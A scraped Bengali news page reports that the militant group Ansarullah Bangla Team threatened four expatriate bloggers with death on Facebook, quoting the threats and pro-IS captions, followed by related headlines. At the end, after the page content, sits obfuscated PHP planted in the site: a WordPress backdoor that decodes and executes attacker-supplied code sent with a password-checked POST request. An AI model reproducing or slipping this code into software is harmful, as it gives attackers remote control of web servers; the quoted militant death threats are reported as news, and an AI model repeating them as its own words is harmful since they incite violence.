শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

প্রবাসী ৪ ব্লগারকে ফের হত্যার হুমকি আনসারুল্লাহর

 
নিজস্ব প্রতিবেদক : প্রবাসী ৪ ব্লগারকে ফের হত্যার হুমকি দিয়েছে আনসারুল্লাহ বাংলা টিম। সালাউদ্দিনের ঘোড়া নামে অন্য একটি ফেসবুক পেজ থেকে ৪ ব্লগারের ছবি প্রকাশ করে হত্যার হুমকি দেওয়া হয়েছে।সোমবার রাতে নিজেদের আনসার আল ইসলাম দাবি করে ওই পেজে এ পোস্ট দেওয়া হয়।

aaaaa pic_129906

 

যে চারজনের ছবি প্রকাশ করে হুমকি দেওয়া হয়েছে তারা হলেন- আসিফ মহিউদ্দিন, অনন্য আজাদ, সানিউর রহমান ও শাম্মি হক। তাদের মধ্যে ব্লগার আসিফ ও সানিউরের নামের পাশে দ্বিতীয় পর্ব লেখা হয়েছে। কারণ এর আগেও তারা জঙ্গি হামলার শিকার হয়েছিলেন। এ চারজন ব্লগারই বর্তমানে প্রবাসে রয়েছেন।

পোস্টে বলা হয়, এবারের টার্গেট এই কাফেররা। প্রবাসের মাটিতেই তোদের জবাই করা হবে। ইনশাআল্লাহ।

১১ ঘন্টা আগে সালাউদ্দিনের ঘোড়া নামের ওই পেজে একটি ছবি পোস্ট করা হয়। ছবিতে দেখা যায় আইএস’র সমর্থকরা অস্ত্রসহ একটি মসজিদে বসে আছে। ছবির পাশে ক্যাপশনে লেখা: আল্লাহ আমাদের দেশের মসজিদগুলোও এভাবে খোরাসানের মতো মুজাহিদীন দ্বারা পূর্ণ করে দিক। আমিন।

এ ছাড়া সোমবার ওই পেজে দেশের একটি দৈনিক পত্রিকায় ছাপা প্রতিবেদনের স্ক্রিনশট দিয়ে তার পাশে লেখা হয়, ‘শেকড় খুঁজে কোনও লাভ হবে না। পরবর্তী টার্গেটও ব্যর্থহীনভাবে হিট করবে ইনশাআল্লাহ।

কোনও প্রাইভেট গানম্যান, ২০-২৫ স্তরের পুলিশি নিরাপত্তা, সিসিটিভি ক্যামেরা কোনও কিছুই আল্লাহর রাস্তার মুজাহিদিনদের রুখতে পারবে না ইনশাআল্লাহ। ইসলাম বিরোধী কাজ থেকে ইস্তফা দেওয়াই হবে নাস্তিক-মুরতাদদের একমাত্র রক্ষাকবজ।’

এতে বলা হয়, ‘সমস্ত ইসলামবিদ্বেষী নাস্তিক-মুরতাদ যারা আল্লাহ, আমাদের প্রিয় নবী মুহাম্মাদ (সা.) ও আমাদের ধর্ম নিয়ে ব্যঙ্গ করবে, গালি-গালাজ করবে, কটূক্তি করবে তারা সবাই আমাদের টার্গেট। ইনশাআল্লাহ আমরা তাদের হত্যা করবো।

এর আগে গত ২০ মে সালাউদ্দিনের ঘোড়া নামের অপর একটি ফেসবুক পেজ থেকে নারায়নগঞ্জের কল্যান্দী এলাকার পিয়ার সাত্তার লতিফ উচ্চ বিদ্যালয়ের প্রধান শিক্ষক শ্যামল কান্তি ভক্তকে হত্যার হুমকি দেওয়া হয়।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}